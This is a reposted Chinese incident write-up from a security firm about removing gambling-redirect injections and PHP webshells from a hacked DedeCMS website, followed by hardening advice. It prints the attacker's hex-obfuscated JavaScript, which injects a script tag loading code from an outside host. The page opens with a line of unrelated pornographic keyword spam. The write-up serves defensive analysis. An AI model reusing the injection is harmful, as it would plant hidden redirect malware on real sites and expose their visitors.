中文字幕在线观看,亚洲а∨天堂久久精品9966,亚洲成a人片在线观看你懂的,亚洲av成人片无码网站,亚洲国产精品无码久久久五月天

客戶網(wǎng)站被跳轉(zhuǎn)到賭博網(wǎng)站的處理解決過程分享

2018-06-23    來源:

容器云強(qiáng)勢上線!快速搭建集群,上萬Linux鏡像隨意使用
2018.6.19當(dāng)天接到一位新客戶反映自己的網(wǎng)站被黑了,網(wǎng)站首頁也被黑客篡改了,網(wǎng)站首頁被加了一些與網(wǎng)站不相符的內(nèi)容與加密的代碼,導(dǎo)致百度網(wǎng)址安全中心提醒您:該頁面可能存在木馬病毒!網(wǎng)站在百度的收錄與快照也被劫持成什么世界杯投注,以及博彩,賭博等等的內(nèi)容,根據(jù)以上客戶給我們反映的網(wǎng)站被黑的問題,我們Sine安全公司立即安排安全技術(shù)人員對客戶網(wǎng)站被黑的情況進(jìn)行了詳細(xì)的網(wǎng)站安全檢測與代碼的人工安全審計,發(fā)現(xiàn)客戶網(wǎng)站首頁之前是經(jīng)常的被篡改,客戶只能刪除掉首頁文件,然后重新生成首頁,實在是反復(fù)被篡改的沒辦法了,才找到我們SINE安全公司來處理網(wǎng)站的安全問題.

客戶網(wǎng)站被跳轉(zhuǎn)到賭博網(wǎng)站的處理解決過程分享

快照被篡改的內(nèi)容圖


一.網(wǎng)站被黑的狀況分析

1.客戶的網(wǎng)站采用的是,織夢DEDECMS系統(tǒng)(PHP+MYSQL數(shù)據(jù)庫架構(gòu)),dedecms漏洞在近幾年實在是爆出了太多,但是現(xiàn)在用dedecms做網(wǎng)站以及平臺的也很多,一般企業(yè)站或做優(yōu)化排名的網(wǎng)站都是用這個織夢的程序來做,優(yōu)化快,訪問速度也快,全站可以靜態(tài)文件生成,方便管理更新文章,也方便網(wǎng)站打開的速度,以及關(guān)鍵詞方面的優(yōu)化與提升。通過與客戶的溝通了解,發(fā)現(xiàn)客戶的網(wǎng)站,只要是發(fā)布新的文章,并在后臺生成新的html頁面,或者生成首頁index.html,就會被攻擊者直接增加了一些加密的代碼與賭博的內(nèi)容,圖片如下:

網(wǎng)站被篡改的內(nèi)容都是加了一些什么,極速賽車,賭博,博彩、賭球,世界杯投注的與網(wǎng)站不相關(guān)的內(nèi)容,而且這個網(wǎng)站代碼還做了JS判斷跳轉(zhuǎn),針對于Baidu搜索來的客戶,會直接跳轉(zhuǎn)到這個極速賽車、賭博、博彩的頁面,導(dǎo)致360提示博彩網(wǎng)站攔截,百度提示風(fēng)險攔截的圖片如下:

客戶網(wǎng)站被跳轉(zhuǎn)到賭博網(wǎng)站的處理解決過程分享

被360安全中心攔截的提示


網(wǎng)站在百度的搜索中會直接風(fēng)險提示:百度網(wǎng)址安全中心提醒你:該頁面可能存在木馬病毒。

客戶網(wǎng)站被跳轉(zhuǎn)到賭博網(wǎng)站的處理解決過程分享

被百度網(wǎng)址安全中心攔截的提示


通過對客戶網(wǎng)站的所有代碼的安全檢測與代碼的人工安全審計,發(fā)現(xiàn)網(wǎng)站首頁index.html中的內(nèi)容被篡改,并發(fā)現(xiàn)在dedecms模板目錄文件下的index.htm文件也被篡改了。

客戶網(wǎng)站被跳轉(zhuǎn)到賭博網(wǎng)站的處理解決過程分享

網(wǎng)站模板目錄列表圖


我們來打開index.htm模板文件,看下代碼:

客戶網(wǎng)站被跳轉(zhuǎn)到賭博網(wǎng)站的處理解決過程分享

模板文件內(nèi)容


下面的這一段代碼是加密的JS跳轉(zhuǎn)代碼,是根據(jù)百度搜索等相應(yīng)的條件,進(jìn)行判斷,然后跳轉(zhuǎn),直接輸入網(wǎng)站域名不會跳轉(zhuǎn)。

window["\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74"]["\\x77\\x72\\x69\\x74\\x65"]('\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x20\\x74\\x79\\x70\\x65\\x3d\\x22\\x74\\x65\\x78\\x74\\x2f\\x6a\\x61\\x76\\x61\\x73\\x63\\x72\\x69\\x70\\x74\\x22\\x20\\x73\\x72\\x63\\x3d\\x22\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x77\\x77\\x2e\\x38\\x30\\x30\\x30\\x6b\\x61\\x69\\x2e\\x63\\x6f\\x6d\\x2f\\x73\\x74\\x61\\x74\\x69\\x63\\x2f\\x6a\\x73\\x2f\\x38\\x30\\x30\\x30\\x6b\\x61\\x69\\x2e\\x6a\\x73\\x22\\x3e\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e');

上面查到一些加密的代碼,用編碼的解密查到,是一些博彩與賭球相關(guān)的內(nèi)容,我們把生成首頁后被篡改的內(nèi)容直接刪除掉,然后對其網(wǎng)站里留存下來的木馬病毒,以及木馬后門進(jìn)行清除,并做好網(wǎng)站的漏洞檢測與漏洞修復(fù),部署網(wǎng)站防篡改方案。

二.網(wǎng)站被黑的清理過程記錄

1.網(wǎng)站經(jīng)過SINE安全技術(shù)的安全審計后,在安全的處理過程中發(fā)現(xiàn)網(wǎng)站根目錄下的datas.php文件內(nèi)容屬于assert類型的一句話木馬。

客戶網(wǎng)站被跳轉(zhuǎn)到賭博網(wǎng)站的處理解決過程分享

一句話木馬后門文件


那么既然發(fā)現(xiàn)有一句話木馬,那肯定是存在PHP腳本木馬的,隨即發(fā)現(xiàn)在css目錄下有個文件是加密的代碼,我們訪問該木馬地址,進(jìn)行了訪問發(fā)現(xiàn)的確是木馬病毒的,所在圖片如下:

客戶網(wǎng)站被跳轉(zhuǎn)到賭博網(wǎng)站的處理解決過程分享

腳本后門木馬功能圖


該P(yáng)HP腳本木馬的操作權(quán)限實在是太大了,對文件的編輯以及改名,以及執(zhí)行惡意的sql語句,查看服務(wù)器的系統(tǒng)信息都可以看的很清楚.對網(wǎng)站的所有程序代碼,進(jìn)行了木馬特征掃描,發(fā)現(xiàn)了N個網(wǎng)站木馬文件,怪不得客戶自己說反反復(fù)復(fù)的出現(xiàn)被黑,網(wǎng)站被篡改的都快要吐血了。掃描到的木馬病毒如下圖所示:

客戶網(wǎng)站被跳轉(zhuǎn)到賭博網(wǎng)站的處理解決過程分享

掃描到的網(wǎng)站后門木馬列表


這么多個腳本木馬后門,我們安全技術(shù)直接進(jìn)行了全部刪除清理,由于客戶網(wǎng)站用的是單獨(dú)的服務(wù)器。那么對服務(wù)器的安全也要進(jìn)行詳細(xì)的安全加固和網(wǎng)站安全防護(hù),查看到網(wǎng)站的mysql數(shù)據(jù)庫,分配給網(wǎng)站使用的是root權(quán)限,(用root管理員權(quán)限會導(dǎo)致整個服務(wù)器都會被黑,增加了攻擊風(fēng)險)我們給客戶服務(wù)器增加了一個普通權(quán)限的數(shù)據(jù)庫賬戶分配給網(wǎng)站,數(shù)據(jù)庫的端口3306以及135端口445端口139端口都進(jìn)行了端口安全策略部署,杜絕外網(wǎng)一切連接,只允許內(nèi)網(wǎng)連接,對服務(wù)器進(jìn)行了詳細(xì)的服務(wù)器安全設(shè)置和部署,后續(xù)我們對網(wǎng)站的所有文件,代碼,圖片,數(shù)據(jù)庫里的內(nèi)容,進(jìn)行了詳細(xì)的安全檢測與對比,從SQL注入測試、XSS跨站安全測試、表單繞過、文件上傳漏洞測試、文件包含漏洞檢測、網(wǎng)頁掛馬、網(wǎng)頁后門木馬檢測、包括一句話小馬、aspx大馬、腳本木馬后門、敏感信息泄露測試、任意文件讀取、目錄遍歷、弱口令安全檢測等方面進(jìn)行了全面的安全檢測,與漏洞修復(fù),至此客戶網(wǎng)站被黑的問題才得以完美的解決。因為之前客戶都是平均一天被篡改兩三次,從做安全部署到今天20號,客戶網(wǎng)站訪問一切正常,沒有被篡改

三.針對于網(wǎng)站被黑的防護(hù)建議

1.定期的更新服務(wù)器系統(tǒng)漏洞(windows 2008 2012、linux centos系統(tǒng)),網(wǎng)站系統(tǒng)升級,盡量不適用第三方的API插件代碼。

2.如果自己對程序代碼不是太了解的話,建議找網(wǎng)站安全公司去修復(fù)網(wǎng)站的漏洞,以及代碼的安全檢測與木馬后門清除,國內(nèi)推薦SINE安全公司、綠盟安全公司、啟明星辰等的網(wǎng)站安全公司,做深入的網(wǎng)站安全服務(wù),來保障網(wǎng)站的安全穩(wěn)定運(yùn)行,防止網(wǎng)站被掛馬之類的安全問題。

3.盡量不要把網(wǎng)站的后臺用戶的密碼設(shè)置的太簡單化,要符合10到18位的大小寫字母+數(shù)字+符號組合。

4.網(wǎng)站后臺管理的路徑一定不能用默認(rèn)的admin或guanli或manage 或文件名為admin.asp的路徑去訪問。

5.服務(wù)器的基礎(chǔ)安全設(shè)置必須要詳細(xì)的做好,端口的安全策略,注冊表安全,底層系統(tǒng)的安全加固,否則服務(wù)器不安全,網(wǎng)站再安全也沒用。

標(biāo)簽: CentOS linux Mysql 安全 代碼 服務(wù)器 服務(wù)器安全 服務(wù)器系統(tǒng) 腳本 漏洞 排名 權(quán)限 數(shù)據(jù)庫 搜索 網(wǎng)站模板 域名

版權(quán)申明:本站文章部分自網(wǎng)絡(luò),如有侵權(quán),請聯(lián)系:west999com@outlook.com
特別注意:本站所有轉(zhuǎn)載文章言論不代表本站觀點!
本站所提供的圖片等素材,版權(quán)歸原作者所有,如需使用,請與原作者聯(lián)系。

上一篇:2018中國財經(jīng)大學(xué)排名,看看哪些大學(xué)實力最強(qiáng)!

下一篇:建好“火車頭” 二師完成連隊“兩委”成員信息采集